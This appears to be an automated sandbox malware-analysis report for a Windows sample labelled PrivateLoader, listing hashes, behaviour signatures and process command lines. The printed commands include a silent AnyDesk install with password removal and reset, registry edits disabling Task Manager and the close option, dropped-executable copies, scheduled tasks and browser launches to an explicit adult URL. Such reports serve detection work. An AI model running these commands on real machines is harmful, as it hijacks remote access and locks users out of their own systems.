memory/2168-1873-0x000007FEF60C0000-0x000007FEF62C0000-memory.dmp
memory/2168-1870-0x000007FEF6A40000-0x000007FEF6A5D000-memory.dmp
memory/2168-1869-0x000007FEF6A60000-0x000007FEF6A71000-memory.dmp
memory/2168-1868-0x000007FEF7020000-0x000007FEF7037000-memory.dmp
memory/2168-1867-0x000007FEFB200000-0x000007FEFB211000-memory.dmp
memory/2168-1866-0x000007FEFB220000-0x000007FEFB237000-memory.dmp
memory/2168-1865-0x000007FEFB240000-0x000007FEFB258000-memory.dmp
memory/2168-1862-0x000000013F400000-0x000000013F4F8000-memory.dmp
memory/2168-1863-0x000007FEFB260000-0x000007FEFB294000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bfd88b827f08bf3789d8ac211f2e5e81 |
| SHA1 | 84c91cff364d6b9c7c5444652d9b0f72a08e54d3 |
| SHA256 | 7896c86656eff8ad59643a16357bfe18670017dd1d4827087862ca76a3aee1f2 |
| SHA512 | e1d9b492385d4ee63cdfbd7ca482d531c30711915f370b61375e91fd38847d113203737b84a5dcc4f2ad11c6f3d1b482c156a9a31fbcf87cb922ab1a992da47b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | afc1a3c89734bb1f288126a6915d8e7c |
| SHA1 | 88de6080044b328b0eed412f3816d966cb31ea04 |
| SHA256 | 09374b02e53608e82443959b9d2439a3a94a75cc87e72b8a4e844aa55ad9e1a3 |
| SHA512 | 2beb608ad996a8d279c324d659ebb45e462d2f5fbf718ab26ef0e4a61d9f9da11d63182d847445c148b9aeafe59051a12ee7c42f63635db71bf95399773c0196 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 8d951d301a4c405355fe3a0b42013c4a |
| SHA1 | 7d91685d8989ec63a154e5692ad8f57297d09a7f |
| SHA256 | 343f89d4e0138b5644db6aebcc26b2d1269c15b3dfdf1393c1d6796d3055914f |
| SHA512 | 3636ea7fdb169b69a1a4f988ab4f782d573cadb0fac2a30bf88b6634e5e10a73750cf7613b8324ee9ab0bdba4b7200ba48dbea3a0e546ed4497b6c60490ef3d5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a0e749e19399649e099feeefc72239d8 |
| SHA1 | b706509aaf2409dfdf2899eb749ace148fab7445 |
| SHA256 | 8e4e872521f30f1efb2edc5fc6ae9e1056837d237b42bcf2923bd9b66eff9a7c |
| SHA512 | bf0343385b2fa395c7176e58b21b93c7b61eb9fd3b57effc73b01cd2804d8ec65e0d61730fd95a9ec917c73efe6968c94c800e05d1d3fc0e4833742c9765dfa6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2d05c3756dfb6fddc1b587bef8f7d4d0 |
| SHA1 | 6c1349b0572477e5db36323b6bb2ff3ad811ac94 |
| SHA256 | 0f1329d586f786f15cd9df273ee5e15863507358c2bc3c7b78ba0ba2ad2c6c06 |
| SHA512 | 0ba5c5021239b47978f30599c43c985566d5f1bd0e6f1c7f2f59edb4e814cc8a17a2bb2a90633e98e6445093918ea9f76800e8523edfa1385cd39b1a729cdce1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bc316bb81383ca854335167818bc667b |
| SHA1 | 06eafe4f80e101a30567cc5c8cf486ad256178c1 |
| SHA256 | 12563580b9734140f377609581b8a0f423f2c7f6f9d72e3cdf8c6e2f3fc90ee0 |
| SHA512 | b43c977ea8182327d9b3d42f501c8f39de508405ccc1c43ef9e4cb97a8ba075b608b4a26043d7b43ac900506a00dd834cdd731a04f642aed7cfa92bd07f4bed9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4ec32abff877c551f010f4e14a3cdafb |
| SHA1 | 9fd1fee5923dbb9c433b4729c5d3852899389aa4 |
| SHA256 | 168f117332fdf53566d60cf48718ecdef9aa2d064fe54ed3f1eca9683424278a |
| SHA512 | 310b557abe60beff8ecd068198526cfcf0b8f0a46e27511e19ccf2ccb85b402869ef90771dce9bf9bd13c5b20d0c8235fa70d3760aeb54d53ae890d81ecadb77 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 304ac5b2bfdebebaa620c4c75e06a809 |
| SHA1 | ec92ada3de18ff4200512d72c52de905dca46efe |
| SHA256 | 796f37df70eeae925550961ae8a8d44181e1d319e0935edc665121e127156c9c |
| SHA512 | 06046386c8edf9d184b0d9bbdf1b4561444ae8bae954baa207f4401d7e1d91f98ce8a96c596f5a13b6bcb0764e0226bbc0e1cb8b9b99c58bb050056831f1de02 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c5d4694d5ae83bc3932abf5a3dc4854c |
| SHA1 | 34f7757aa1bc0da8be8d8450c098db9c85df3498 |
| SHA256 | 2c3cf4b2d6a10b5ef48190d914938bc051efcb46e85ef47687888ba3c3f5b156 |
| SHA512 | 311e22492fe78268d6549e628c79e9d9468ef1affb7143019ae5537bf2be82fc0f947510aac85df8292a92046ac68e2f442c8817956ae4333913b15599fcdf75 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | d357b725d05a638484e8b492600e197b |
| SHA1 | 83244ef16a0d6471cd811eb15f2843118c596bfd |
| SHA256 | 3d1eaac1f6b2d1425909e0c38968009d4c9de9de6abce939d06e4e12491e0fa8 |
| SHA512 | 4db32e851aca535d9520a04b3b95721ad897fa2093baca8c76c76972cc43fbc747ef12870904d31fd7aa4c62283ca45bb8944c20ca7fe648f412a9cbb5b9ca6e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f42ac14cee5dc409f20b2e50a7909ad7 |
| SHA1 | af30f9a96a61c7f5df3275b3e8da440dc9ce499d |
| SHA256 | 37f99855cb765f4b9ff8aee8664d581681f56d424f3d6bc6e76d53ea1f4f743b |
| SHA512 | 4c74ee2a57f14aaea0cfbad801b1fdeb8c7b0f9737d2ac60148c49c33afc35e7b231293470863735787ed7cf3bb68df61b74107652f10c51fb17bb2284b833dc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b55da9f2032ffb0f9e9950abc7fb7ba7 |
| SHA1 | 62917a7d99ec6c71ee42b8214f57602db71131c1 |
| SHA256 | 2ce119f66793101ba85ef9d3e03ee78f0f12c2f121edbd591057a7d1cec589ac |
| SHA512 | 52711bc437b7e61096f10ec409b250e7d59a7bc5106af32cff912a37fd0c353dd1bf4a1aeb9938772c2406984be6cc8eb0f61fab724a41e5ba19eef55756bd94 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 18:38
Reported
2024-05-09 18:40
Platform
win10v2004-20240508-en
Max time kernel
143s
Max time network
151s
Command Line
Signatures
PrivateLoader
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-sys.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\ProgramData\AnyDesk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-sys.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Checks installed software on the system
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\AnyDesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\AnyDesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Goonscript.exe
"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4360,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4908,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5344,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5588,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5864,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5324,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6272,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6268 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6416,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6676,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6652,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7020,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7184,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:8
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --field-trial-handle=7348,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=7368,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7676 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7640,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7820 /prefetch:8
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=7976,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=8104,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=8136 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x300
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6064,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5932 /prefetch:8
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2362.tmp\2363.tmp\2364.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
